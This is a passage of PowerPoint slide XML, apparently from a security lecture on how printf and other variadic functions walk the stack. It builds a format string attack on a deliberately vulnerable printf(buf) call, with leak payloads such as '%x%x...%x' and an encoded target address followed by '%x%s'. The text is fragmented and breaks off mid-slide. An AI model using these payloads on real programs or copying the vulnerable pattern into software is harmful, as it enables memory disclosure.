              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>variadic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> functions, the compiler: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nows number and types of arguments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mits instructions for caller to push arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>right to left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mits instructions for callee to access arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>via frame pointer (or stack pointer [advanced])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variadic functions, the compiler emits instructions for the program to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>walk the stack at runtime for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857500"/>
            <a:ext cx="3352800" cy="1143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r>
              <a:rPr lang="en-US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Fact:</a:t>
            </a:r>
            <a:r>
              <a:rPr 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  <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr 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mbria"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Ubuntu Linux has over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>99,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>known bugs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3" name="Picture 2" descr="iStock_000018008714XSmall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17822"/>
            <a:ext cx="2514600" cy="2014279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="iStock_000013159460XSmall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r="31501"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5792823" y="2895601"/>
            <a:ext cx="1927412" cy="3076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86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Suppose we want to implement a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-like function that only prints when a debug key is set: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229600" cy="281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void debug(char *key, char *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, ...) {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va_list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ap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char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[BUFSIZE];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if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>KeyInList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(key)) return;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va_start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ap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vsprintf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ap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va_end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ap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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s”,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34318" y="3623803"/>
            <a:ext cx="3371482" cy="698040"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107650"/>
              <a:gd name="adj2" fmla="val 774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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to point to stack using last fixed argument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733800" y="5248873"/>
            <a:ext cx="1812805" cy="361216"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -137184"/>
              <a:gd name="adj2" fmla="val -12057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69403" y="4622388"/>
            <a:ext cx="3283890" cy="339326"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99351"/>
              <a:gd name="adj2" fmla="val -611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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with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943600" y="3048000"/>
            <a:ext cx="2780696" cy="393240"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -177073"/>
              <a:gd name="adj2" fmla="val 919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pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap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62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4290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Think of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> as</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a pointer to the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>second argument</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(first after format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Each format specifier indicates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Know how far to increment pointer for next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rounded Rectangular Callout 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="1417597" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -123682"/>
              <a:gd name="adj2" fmla="val -14958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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>specifier</a:t>
            </a:r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3352800" y="2620428"/>
            <a:ext cx="1828800" cy="884772"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105504"/>
              <a:gd name="adj2" fmla="val -433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specified argument (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_list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3352799" y="1676400"/>
            <a:ext cx="1417597" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -119382"/>
              <a:gd name="adj2" fmla="val -2508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n-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> specified argument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04495"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="1461558" cy="485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callee-save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33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7935" y="4347939"/>
            <a:ext cx="492443" cy="7201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callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Left Brace 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="3200400"/>
            <a:ext cx="286577" cy="30152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533400" y="1371600"/>
            <a:ext cx="286577" cy="18288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935" y="2000236"/>
            <a:ext cx="492443" cy="7010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caller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3165" y="2427863"/>
            <a:ext cx="320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char s1[] = “hello”;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s2[] = “world”;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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s %s %u”,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   s1, s2, 42); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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59014"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="1461558" cy="485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callee-save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333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47935" y="4321715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printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Left Brace 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="3200400"/>
            <a:ext cx="286577" cy="30152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533400" y="1371600"/>
            <a:ext cx="286577" cy="18288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935" y="2000236"/>
            <a:ext cx="492443" cy="7010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caller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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3048000" y="4114800"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96594"/>
              <a:gd name="adj2" fmla="val -22432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of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“%s %s %u”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rounded Rectangular Callout 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3124200"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -115573"/>
              <a:gd name="adj2" fmla="val -1248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of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br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3352800" y="2209800"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -116417"/>
              <a:gd name="adj2" fmla="val -367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of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br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3048000" y="1371600"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96575"/>
              <a:gd name="adj2" fmla="val 4022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format strings, and more generally variadic functions, are implemented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Peaking at Memory with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf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599" y="473028"/>
            <a:ext cx="5486401" cy="16605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1. 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foo(char *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2.    char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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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4.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf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5.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3103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080483d4 &lt;foo&gt;:    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483d4: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80483d5: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80483d7:	sub    $0x28,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; allocate 40 bytes on stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/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80483da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mov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0x8(%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:=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M[ebp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+8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] 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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0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of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fmt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80483dd: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%eax,0x4(%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M[esp+4]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-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push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as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0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 2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80483e1:	lea    -0x20(%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:=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ebp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-32    -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of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buf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80483e4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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esp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]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   - push as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0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 1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80483e7:	call   80482fc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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483ec:	lea    -0x20(%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:= ebp-32    -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addr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of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf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 again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80483ef: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      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; M[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esp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] :=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eax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   - push as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1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80483f2:	call   804830c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf@plt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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483f7:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483f8:	ret    </a:t>
            </a:r>
          </a:p>
          <a:p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 @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73762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(32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stale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2895600" y="3733800"/>
            <a:ext cx="1659020" cy="659131"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85521"/>
              <a:gd name="adj2" fmla="val 3719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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fmt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895600" y="4490762"/>
            <a:ext cx="1659020" cy="659131"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86650"/>
              <a:gd name="adj2" fmla="val -2742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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r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1. 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foo(char *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2.    char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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  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258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70634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(32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810000" y="3505200"/>
            <a:ext cx="4876800" cy="2457510"/>
            <a:chOff x="3810000" y="3505200"/>
            <a:chExt cx="4876800" cy="2457510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="3505200"/>
              <a:ext cx="4876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What are the effects if </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                </a:rPr>
                <a:t>fmt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t> is: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 smtClean="0"/>
                <a:t>%s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 smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
                <a:t>s%c</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/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 smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
                <a:t>x%x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t>...%x</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0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015420" y="4634423"/>
              <a:ext cx="408559" cy="1600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3729" y="5562600"/>
              <a:ext cx="1131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11 times</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5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1. 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foo(char *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2.    char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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  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590800" y="4007306"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97129"/>
              <a:gd name="adj2" fmla="val 1105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fmt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588579" y="4648200"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -100558"/>
              <a:gd name="adj2" fmla="val -2666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buf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4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Specific Address—1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1606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(32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0000" y="3505200"/>
            <a:ext cx="4795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Observe: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>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on the call stack, thus we can walk to it with the correct specifiers.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4491" y="5562600"/>
            <a:ext cx="370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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is “%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>x%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Arc 19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1. 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foo(char *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2.    char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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  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971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Specific Address—2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935" y="5159221"/>
            <a:ext cx="492443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printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Left Brace 27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18218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buf’s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other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28 bytes)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0xbffff747</a:t>
                      </a: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stale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0" name="Arc 19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5052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Idea! Encode address to peek in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> first. Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0xbffff747</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x47\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/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/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>little endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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1" y="563843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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x47\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%x%s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:cs typeface="Consola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810000" y="1524000"/>
            <a:ext cx="3687027" cy="16605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1. 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foo(char *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2.    char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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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fmt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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
